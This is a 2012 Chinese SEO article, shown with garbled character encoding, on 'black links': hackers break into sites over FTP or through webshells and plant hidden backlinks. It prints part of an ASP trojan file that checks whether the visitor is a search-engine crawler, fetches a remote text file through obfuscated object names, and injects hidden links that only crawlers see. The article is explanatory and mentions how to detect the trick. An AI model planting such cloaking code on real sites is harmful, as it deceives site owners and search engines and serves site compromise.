隱藏在網(wǎng)站中的殺手 淺談黑鏈的手段
來源:SEO優(yōu)化 2012-08-31
黑鏈?zhǔn)荢EO手法中相當(dāng)普遍的一種手段,籠統(tǒng)地說,它就是指一些人用非正常的手段獲取的其它網(wǎng)站的反向鏈接,最常見的黑鏈就是通過各種網(wǎng)站程序漏洞獲取搜索引擎權(quán)重或者PR較高的網(wǎng)站的WEBSHELL,進(jìn)而在被黑網(wǎng)站上鏈接自己的網(wǎng)站。
黑客們做黑鏈的方式可能多種多樣,但手段其實(shí)只有兩種,一種是直接在目標(biāo)網(wǎng)站上直接加上特定的鏈接代碼,另外一種只針對(duì)搜索引擎的訪問來做,讓搜索引擎誤認(rèn)為目標(biāo)站上存在著這樣的鏈接。下面對(duì)這兩種方法做一個(gè)詳細(xì)的解釋。
1.直接在目標(biāo)頁面上加代碼:這應(yīng)該是最普通的一種手段,也是很容易發(fā)現(xiàn)的手段。以前的黑鏈大部分都是采用這種手段來進(jìn)行。首先需要入侵目標(biāo)站的FTP,然后針對(duì)網(wǎng)站所用的程序,在模板或者其他的頁面加上“隱形”的鏈接。這種手段隱蔽性比較差,如果目標(biāo)站的管理員懂得一定的SEO知識(shí)的話,很容易就會(huì)被發(fā)現(xiàn)。于是,更多的黑客開始使用第二個(gè)手段。
2.通過一段判定的代碼,判定來訪者的名稱和IP地址,如果來訪者是蜘蛛,則將另外一段包涵鏈接的代碼加入到目標(biāo)頁面中。下面以一個(gè)ASP的例子進(jìn)行說明:
黑客侵入到目標(biāo)站的FTP,在程序里留下2個(gè)木馬文件,一個(gè)文件名為int.asp,所包含的代碼為:
0 or instr(httpuser,”google”)>0 or instr(httpuser,”sogou”)>0 or instr(httpuser,”soso”)>0
then Set ObjXMLHTTP=Server.createobject(“MSX”+”ML2.s”+”erv”+”erXML”+”HTTP”) ObjXMLHTTP.Open “GET”,”domain/a/193.txt”,False ObjXMLHTTP.send GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing set objStream = Server.CreateObject(“Adodb.Stream”) objStream.Type = 1
objStream.Mode =3 objStream.Open objStream.Write
GetHtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = “gb2312″ GetHtml = objStream.ReadText objStream.Close key1=lcase(GetHtml) key1=Replace(key1&””,”-istxt-”,””)
response.Write key1 end if
%>
通過IP和訪問名稱判定來訪者是否為蜘蛛,將另外一個(gè)文件名字叫“193.txt”(主要是鏈接的代碼)的文件寫入到目標(biāo)頁面中。這樣蜘蛛抓取的代碼跟我們看到的代碼是不一樣的。不管是檢查網(wǎng)頁源文件還是用站長工具,都沒辦法發(fā)現(xiàn)黑鏈的存在。只有一種辦法,那就是檢查快照存檔的代碼頁面,才能夠看出問題來。
第二種辦法雖然復(fù)雜了點(diǎn),但是不容易被發(fā)現(xiàn),就算用這種方法讓你的網(wǎng)站被K,你可能一時(shí)半刻都無法發(fā)現(xiàn)問題。實(shí)在屬于殺手級(jí)別的黑鏈?zhǔn)侄巍?/p>
本文來自:,轉(zhuǎn)載請(qǐng)注明出處。
感謝 五金機(jī)電網(wǎng) 的投稿
文章編輯: 365webcall網(wǎng)上客服系統(tǒng)(www.365webcall.com)
我的評(píng)論
登錄賬號(hào): | 密碼: | 快速注冊(cè) | 找回密碼 |